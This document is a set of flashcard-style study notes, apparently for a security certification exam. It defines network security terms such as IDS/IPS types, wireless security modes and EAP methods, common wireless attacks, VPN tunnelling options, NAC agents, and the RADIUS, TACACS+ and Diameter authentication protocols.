IDSs and IPSs
inspect traffic using the same functionality as a protocol analyzer
HIDS
detect attacks on local systems such as workstations and servers; protect local resources on the host and can detect some malware that isn't detected by traditional antivirus software
NIDS
detects attacks on networks
Signature-based IDS/IPS
uses signatures to detect known attacks or vulnerabilities
Heuristic-based or Behavioral-based IDSs (Anomaly-based IDSs)
require a baseline and detect attacks based on anomalies or when traffic is outside expected boundaries
False Positive
incorrectly raises an alert indicating an attack when an attack is not active; increase workload of admin
False Negative
attack is active, but not reported
IPS
placed inline w/ traffic (in-band) and can stop attacks before they reach the internal network; actively monitor data streams, detect malicious content, prevent it from reaching a network
IDS/IPS
protect internal private networks, such as private supervisory control and data acquisition (SCADA) networks
SSL/TLS Accelerators
dedicated hardware devices that handle TLS traffic; other devices, such as a web server, can off-load TLS traffic handling to the accelerator
SSL Decryptors
allow an organization to inspect traffic, even when traffic is using SSL/TLS
Software Defined Network (SDN)
uses virtualization technologies to route traffic instead of using hardware routers and switches; separates data and control planes
Honeypots and Honeynets
appear to have valuable data and attempt to divert attackers away from live networks; security personnel use them to observe current attack methodologies and gather intel on attacks
802.1x Server
provides strong port security using port-based authentication; prevents rogue devices from connecting to a network by ensuring that only authorized clients can connect; EAP, PEAP, EAP-TTLS, EAP-FAST. Most Secure EAP Method is EAP-TLS.
Wireless Access Points (WAP)
connect wireless clients to a wired network; omnidirectional antennas
Fat AP (stand-alone AP)
everything needed to connect wireless clients to a wireless network
Thin APs
controller-based; controller configures and manages thin AP
SSID
name of wireless network; disabling SSID broadcast hides a wireless network form casual users
MAC Filtering
restrict access to wireless networks; attackers can discover authorized MACs and spoof an authorized MAC address
Directional Antennas
narrower beams and longer ranges
Ad hoc Wireless Network
2+ devices connected together w/out an AP
Wi-Fi Protected Access (WPA)
TKIP/CCMP, WPA and TKIP have been depreciated
Pre-Shared Key (PSK)
used by personal mode; easy to implement and used in many smaller wireless networks
Enterprise Mode
more secure than personal mode; adds authentication; uses 1x authentication server implemented as a RADIUS server
Open Mode
doesn't use PSK or 1x server; many hot spots use open mode when providing free wireless access to customers
EAP-TLS
most secure, requires certificate on the server and on each wireless client
EAP-TTLS and PEAP
require certificate on the server, but not the client
PEAP
often implemented w/ MS-CHAPv2.
LEAP
proprietary to Cisco and does not require certificate, replaced by EAP-FAST
Captive Portal
forces wireless clients to complete a process, such as acknowledging a policy or paying for access, before it grants them access to network
Disassociation Attack
effectively removes a wireless client form a network, forcing it to reauthenticate
WPS
allows users to easily configure a wireless device by pressing a button or entering a short PIN; NOT secure; attack can discover PIN within hours, PIN used to discover passphrase
Rogue Access Point (rogue AP)
AP placed in network w/out official authorization
Evil Twin
rogue AP with same SSID as a legitimate AP
Jamming Attack
floods a wireless frequency w/ noise, blocking wireless traffic
Initialization Vector (IV)
attack attempts to discover IV and uses it to discover passphrase
Near Field Communication (NFC)
attack uses an NFC reader to read data from mobile devices
Bluejacking
practice of sending unsolicited messages to a phone
Bluesnarfing
unauthorized access to, or theft of info from, a Bluetooth device
Wireless Replay Attack
attacker captures data sent b/w two entities, modifies it, then impersonates one of the parties by replaying the data (WPA2 using CCMP and AES prevents attacks)
Radio-Frequency ID (RFID)
attacks include eavesdropping, replay, and DoS
VPN
provides access to private networks via a public network, such as the Internet
VPN Concentrators
dedicated devices that provide secure remote access to remote users
IPsec
common tunneling protocol used w/ VPNs; secures traffic within tunnel; provides authentication w/ AH & ESP
Encapsulating Security Payload (ESP)
encrypts VPN traffic and provides confidentiality, integrity, and authentication
IPsec Tunnel Mode
encrypts entire IP packets used in the internal network; some VPNs use TLS to encrypt traffic
IPsec Transport Mode
only encrypts payload and is commonly used in private networks, but not with VPNs
Full Tunnel
encrypts all traffic after user has connected to a VPN
Split Tunnel
only encrypts traffic destined for the VPNs private network
Site-to-Site VPNs
provide secure access b/w two networks; can be on-demand or always-on VPNs
Network Access Control (NAC)
inspects clients for specific health conditions such as up-to-date antivirus software; can redirect unhealthy clients to a remediation network
Permanent/persistent NAC Agent
installed on client and stays on client
Dissolvable NAC Agent (Agentless)
downloaded and run on client when client logs on, and deleted after session ends; commonly used for employee-owned mobile devices
Remote Access Authentication
user accesses a private network from a remote location, such as w/ VPN connection
PAP
uses password or PIN for authentication; sends passwords in cleartext
CHAP
more secure than PAP and uses a handshake process when authenticating clients
MS-CHAPv2
provides mutual authentication
RADIUS
provides central authentication for multiple remote access services; relies on use of shared secrets and only encrypts password during authentication process; uses UDP
TACACS+
used by some Cisco systems as an alternative to RADIUS, uses TCP, encrypts entire authentication process and supports multiple challenges and responses
Diameter
improvement over RADIUS; uses TCP; encrypts entire authentication process, and supports many additional capabilities
Authentication, Authorization, Accounting (AAA) Protocols
RADIUS, TACACS+, and Diameter